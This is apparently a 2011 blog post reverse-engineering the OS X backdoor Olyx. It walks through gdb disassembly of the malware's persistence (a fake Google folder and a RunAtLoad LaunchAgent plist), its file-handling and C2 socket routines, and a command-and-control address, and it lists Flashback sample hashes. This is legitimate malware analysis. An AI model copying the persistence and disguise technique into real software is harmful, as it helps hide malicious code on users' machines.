Thursday, October 27, 2011

OS X backdoor Olyx

OS X malware has been making the news lately, something new once in awhile.  Olyx backdoor was discovered in the summer(Dr.Web) (contagiodump) I just recently got a chance to look at it myself. I haven't seen a lot of reversing  blogs on this backdoor so it's a good chance to learn a little bit of reversing malware on OS X :).

I started off by using the file and strings utility to examine the file: Current events 2009 July 5. The file output shows that this a Mach-O executable for a 32bit architecture. The strings output shows a plist file( used for user configurations), an IP address( used by the backdoor), and some functions for managing files( for uploads/downloads).



I opened the file in gdb, and disassembled main to understand what the backdoor would do once executed. I noticed functions such as fopen,mkdir,fwrite,fork, execve, next would be to examine the parameters passed to these functions.




0x00001c7f <main+49>:          mov    DWORD PTR [esp],0x1e08
0x00001c86 <main+56>:         call   0x1f04 <dyld_stub_mkdir>

(gdb) x/s 0x1e08
0x1e08:      "/Library/Application Support/google"

0x00001c93 <main+69>:         mov    DWORD PTR [esp],0x1e30
0x00001c9a <main+76>:         call   0x1eec <dyld_stub_fopen$UNIX2003>

0x00001cba <main+108>:      mov    DWORD PTR [esp],eax
0x00001cbd <main+111>:      call   0x1ef8 <dyld_stub_fwrite$UNIX2003>

0x00001db4 <main+358>:      movl   $0x1e30,(%esp)
0x00001dbb <main+365>:      call   0x1eda <dyld_stub_execve>

(gdb) x/s 0x1e30
0x1e30:      "/Library/Application Support/google/startp"

(gdb) x/s 0x1e80
0x1e80:      "/Library/LaunchAgents/www.google.com.tstart.plist"
 

the plist file:
<string>/Library/Application Support/Google/startp</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>LaunchOnlyOnce</key>
 
  • The backdoor creates a folder to disguise itself as a google application.
  • Creates another executable named startp in the google folder.
  • Creates the plist file that will allow it to run each time a user restarts his computer.
  • Launches the new startp bin.

Without running the the program to find the second executable, you can use the hexdump utility and search for the Intel Mach-O magic number "CEFAEDFE"(located at offset 1240).

 
I had problem running the binary, maybe due to this?


 We can still take a look  for anything interesting, disassembly of main shows that a thread is created..

int pthread_create(pthread_t *thread, const pthread_attr_t *attr,
    void *(*start_routine)(void*), void *arg);

- The thread is created executing start_routine with arg as its sole argument.


 Looking at the 3rd parameter the start routine is the address 0x23de, this is where party starts. :)



The backdoor uses a set CFileManagger* functions for uploading,downloading, opening files.
Here's example of opening a file

Dump of assembler code for function CFileManagerOpenFile:
0x00004b1c <CFileManagerOpenFile+0>:    push   ebp
0x00004b1d <CFileManagerOpenFile+1>:    mov    ebp,esp
0x00004b1f <CFileManagerOpenFile+3>:    sub    esp,0x18
0x00004b22 <CFileManagerOpenFile+6>:    call   0x5c74 <dyld_stub_fork>
0x00004b27 <CFileManagerOpenFile+11>:    mov    edx,0x1
0x00004b2c <CFileManagerOpenFile+16>:    test   eax,eax
0x00004b2e <CFileManagerOpenFile+18>:    jne    0x4b4d <CFileManagerOpenFile+49>
0x00004b30 <CFileManagerOpenFile+20>:    mov    DWORD PTR [esp+0x8],0x0
0x00004b38 <CFileManagerOpenFile+28>:    mov    DWORD PTR [esp+0x4],0x0
0x00004b40 <CFileManagerOpenFile+36>:    mov    eax,DWORD PTR [ebp+0xc]
0x00004b43 <CFileManagerOpenFile+39>:    mov    DWORD PTR [esp],eax
0x00004b46 <CFileManagerOpenFile+42>:    call   0x5c5c <dyld_stub_execve>

The packets are compressed using the LZO compression, and decompressed when received.
http://www.oberhumer.com/opensource/lzo/


0x00002e20 <CClientSocketOnRead+539>:    mov    DWORD PTR [esp+0xc],ebx
0x00002e24 <CClientSocketOnRead+543>:    mov    DWORD PTR [esp+0x8],edi
0x00002e28 <CClientSocketOnRead+547>:    lea    ecx,[ebp-0x24]
0x00002e2b <CClientSocketOnRead+550>:    mov    DWORD PTR [esp+0x4],ecx
0x00002e2f <CClientSocketOnRead+554>:    mov    eax,DWORD PTR [ebp-0x44]
0x00002e32 <CClientSocketOnRead+557>:    mov    DWORD PTR [esp],eax  
0x00002e35 <CClientSocketOnRead+560>:    call   0x459f <uncompress> .

Setting up socket and connecting to IP address 121.254.173, found earlier with strings.

0x00002f66 <ClientSocketConnect+46>:    mov    DWORD PTR [esp+0x8],0x6
0x00002f6e <ClientSocketConnect+54>:    mov    DWORD PTR [esp+0x4],0x1
0x00002f76 <ClientSocketConnect+62>:    mov    DWORD PTR [esp],0x2
0x00002f7d <ClientSocketConnect+69>:    call   0x5d58 <dyld_stub_socket>


0x00002fbc <ClientSocketConnect+132>:    mov    DWORD PTR [esp+0x8],0x10
0x00002fc4 <ClientSocketConnect+140>:    mov    DWORD PTR [esp+0x4],eax
0x00002fc8 <ClientSocketConnect+144>:    mov    eax,DWORD PTR [ebx+0x13c]
0x00002fce <ClientSocketConnect+150>:    mov    DWORD PTR [esp],eax
0x00002fd1 <ClientSocketConnect+153>:    call   0x5c50 <dyld_stub_connect$UNIX2003>


So is malware emerging for OS X  or just a phase?



Anyone willing to share Flashback? I'd really appreciate it :).

MD5 hash of Flashback.C sample (actual .pkg): 041ec03a36598a9823fb342cd9840acc
MD5 hash of Flashback.C sample (postinstall): e24979f7bd55a458a33247c5201a6a7d

Good resource for reversing on OS X

http://reverse.put.as/